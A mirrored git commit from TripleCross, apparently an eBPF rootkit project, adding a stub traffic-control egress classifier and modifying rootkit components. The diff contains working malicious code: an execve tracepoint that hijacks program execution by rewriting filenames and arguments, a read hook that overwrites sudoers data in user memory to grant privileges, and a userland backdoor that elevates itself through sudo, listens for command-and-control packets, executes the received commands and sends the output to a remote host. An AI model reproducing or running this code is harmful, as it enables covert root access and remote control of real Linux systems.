mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-16 23:33:06 +08:00
Added new TC module, updates to the exec hooking system and the userland module
This commit is contained in:
h3xduck
4
.vscode/settings.json
vendored
4
.vscode/settings.json
vendored
@@ -20,6 +20,8 @@
|
||||
"bpf_helper_defs.h": "c",
|
||||
"bpf.h": "c",
|
||||
"stddef.h": "c",
|
||||
"ring_buffer.h": "c"
|
||||
"ring_buffer.h": "c",
|
||||
"bpf_helpers.h": "c",
|
||||
"tcp_helper.h": "c"
|
||||
}
|
||||
}
|
||||
Binary file not shown.
File diff suppressed because it is too large
Load Diff
@@ -16,7 +16,7 @@ COMMON_INCLUDES := -I$(abspath ./ebpf/include) -I$(abspath ./user/include)
|
||||
# Use our own libbpf API headers and Linux UAPI headers distributed with
|
||||
# libbpf to avoid dependency on system-wide headers, which could be missing or
|
||||
# outdated
|
||||
INCLUDES := -I$(OUTPUT) -I./libbpf/include/uapi -I$(dir $(VMLINUX))
|
||||
INCLUDES := -I$(OUTPUT) -I./libbpf/include/uapi -I$(dir $(VMLINUX)) -I./libbpf/include/uapi/linux
|
||||
#INCLUDES := -I$(OUTPUT) -I./libbpf/include/uapi -I/lib/modules/5.11.0-41-generic/build/include -I/lib/modules/$$(uname -r)/build/include/uapi -I/lib/modules/$$(uname -r)/build/include/generated/uapi -I/lib/modules/$$(uname -r)/build/arch/x86/include -I/lib/modules/$$(uname -r)/build/arch/x86/include/generated #-I$(dir $(VMLINUX))
|
||||
CFLAGS := -g -Wall
|
||||
ARCH := $(shell uname -m | sed 's/x86_64/x86/')
|
||||
@@ -100,6 +100,11 @@ $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
|
||||
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@
|
||||
$(Q)rm $(USER_INCLUDES_OBJ)
|
||||
|
||||
tckit: $(abspath $(EBPF)/include/bpf)/tc.c
|
||||
clang -O2 -emit-llvm -c $(abspath $(EBPF)/include/bpf)/tc.c -o - | \
|
||||
llc -march=bpf -mcpu=probe -filetype=obj -o tc.o
|
||||
|
||||
|
||||
# delete failed targets
|
||||
.DELETE_ON_ERROR:
|
||||
|
||||
|
||||
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -115,7 +115,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
||||
if((void*)ctx->filename==(void*)(ctx->argv)){
|
||||
bpf_printk("Equal pointers");
|
||||
}else{
|
||||
bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
|
||||
//bpf_printk("Not equal pointers %u, %u", ctx->filename, ctx->argv);
|
||||
}
|
||||
|
||||
if(str_n_compare((char*)filename, ARGUMENT_LENGTH, (char*)PATH_EXECUTION_HIJACK_PROGRAM, sizeof(PATH_EXECUTION_HIJACK_PROGRAM), sizeof(PATH_EXECUTION_HIJACK_PROGRAM)-1)!=0){
|
||||
@@ -168,7 +168,6 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
||||
return -1;
|
||||
}
|
||||
|
||||
bpf_printk("One success\n");
|
||||
hijacker_state = 1;
|
||||
|
||||
unsigned char newfilename[ARGUMENT_LENGTH] = {0};
|
||||
@@ -182,9 +181,9 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
||||
|
||||
bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
|
||||
bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
|
||||
/*bpf_printk("ARGV1: %s\n", argv[1]);
|
||||
bpf_printk("ARGV2: %s\n", argv[2]);
|
||||
bpf_printk("ORIGINAL %s\n\n", filename);*/
|
||||
bpf_printk("NEW ARGV1: %s\n", newargv[1]);
|
||||
bpf_printk("NEW ARGV2: %s\n", newargv[2]);
|
||||
//bpf_printk("ORIGINAL %s\n\n", filename);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@@ -102,7 +102,7 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
|
||||
//For including an user in the sudoers file
|
||||
//We just put our new line there, independently on what the rest of the file contains
|
||||
if(data->is_sudo==1){
|
||||
bpf_printk("Proceeding to verwrite sudo\n");
|
||||
//bpf_printk("Proceeding to verwrite sudo\n");
|
||||
if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
|
||||
bpf_printk("Error writing to user memory\n");
|
||||
return -1;
|
||||
@@ -201,7 +201,7 @@ static __always_inline int handle_tp_sys_enter_openat(struct sys_openat_enter_ct
|
||||
|
||||
data.is_sudo = 1;
|
||||
bpf_map_update_elem(&fs_open, &pid_tgid, &data, BPF_ANY);
|
||||
bpf_printk("It was a sudo!\n");
|
||||
//bpf_printk("It was a sudo!\n");
|
||||
|
||||
return 0;
|
||||
|
||||
|
||||
39
src/ebpf/include/bpf/tc.c
Normal file
39
src/ebpf/include/bpf/tc.c
Normal file
@@ -0,0 +1,39 @@
|
||||
#include <linux/bpf.h>
|
||||
#include <linux/if_ether.h>
|
||||
#include <linux/pkt_cls.h>
|
||||
#include <linux/swab.h>
|
||||
#include <bpf/bpf_tracing.h>
|
||||
#include <bpf/bpf_helpers.h>
|
||||
|
||||
|
||||
struct pkt_ctx_t {
|
||||
struct cursor *c;
|
||||
struct ethhdr *eth;
|
||||
struct iphdr *ipv4;
|
||||
struct tcphdr *tcp;
|
||||
struct udphdr *udp;
|
||||
struct http_req_t *http_req;
|
||||
};
|
||||
|
||||
SEC("classifier/egress")
|
||||
int classifier(struct __sk_buff *skb){
|
||||
void *data_end = (void *)(unsigned long long)skb->data_end;
|
||||
void *data = (void *)(unsigned long long)skb->data;
|
||||
struct ethhdr *eth = data;
|
||||
bpf_printk("Heey\n");
|
||||
if (data + sizeof(struct ethhdr) > data_end)
|
||||
return TC_ACT_SHOT;
|
||||
|
||||
if (eth->h_proto == ___constant_swab16(ETH_P_IP))
|
||||
/*
|
||||
* Packet processing is not implemented in this sample. Parse
|
||||
* IPv4 header, possibly push/pop encapsulation headers, update
|
||||
* header fields, drop or transmit based on network policy,
|
||||
* collect statistics and store them in a eBPF map...
|
||||
*/
|
||||
return 0;//process_packet(skb);
|
||||
else
|
||||
return TC_ACT_OK;
|
||||
}
|
||||
|
||||
char _license[4] SEC("license") = "GPL";
|
||||
Binary file not shown.
@@ -71,16 +71,6 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
}
|
||||
|
||||
|
||||
if(geteuid() != 0){
|
||||
//We do not have privileges, but we do want them. Let's rerun the program now.
|
||||
char* args[argc+1];
|
||||
args[0] = "sudo";
|
||||
for(int ii=0; ii<argc; ii++){
|
||||
args[ii+1] = argv[ii];
|
||||
}
|
||||
execve("/usr/bin/sudo", args, envp);
|
||||
}
|
||||
|
||||
time_t rawtime;
|
||||
struct tm * timeinfo;
|
||||
|
||||
@@ -108,10 +98,21 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
}
|
||||
|
||||
write(fd, "\n", 1);
|
||||
|
||||
|
||||
|
||||
write(fd, "Sniffing...\n", 13);
|
||||
|
||||
if(geteuid() != 0){
|
||||
//We do not have privileges, but we do want them. Let's rerun the program now.
|
||||
char* args[argc+1];
|
||||
args[0] = argv[0];
|
||||
for(int ii=0; ii<argc; ii++){
|
||||
args[ii+1] = argv[ii];
|
||||
}
|
||||
if(execve("/usr/bin/sudo", args, envp)<0){
|
||||
perror("Failed to execve()");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
||||
packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
|
||||
if(packet.ipheader == NULL){
|
||||
write(fd, "Failed to open rawsocket\n", 1);
|
||||
@@ -148,7 +149,7 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
printf("Received request: %s\n", p);
|
||||
char* res = execute_command(p);
|
||||
char* payload_buf = calloc(4096, sizeof(char));
|
||||
strcat(payload_buf, CC_PROT_MSG);
|
||||
strcpy(payload_buf, CC_PROT_MSG);
|
||||
strcat(payload_buf, res);
|
||||
packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf);
|
||||
if(rawsocket_send(packet_res)<0){
|
||||
|
||||
Binary file not shown.
@@ -200,6 +200,7 @@ int main(int argc, char**argv){
|
||||
|
||||
module_config_attr.skel = skel;
|
||||
err = setup_all_modules();
|
||||
|
||||
// Set up ring buffer polling --> Main communication buffer kernel->user
|
||||
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb_comm), handle_rb_event, NULL, NULL);
|
||||
if (rb==NULL) {
|
||||
|
||||
Reference in New Issue
Block a user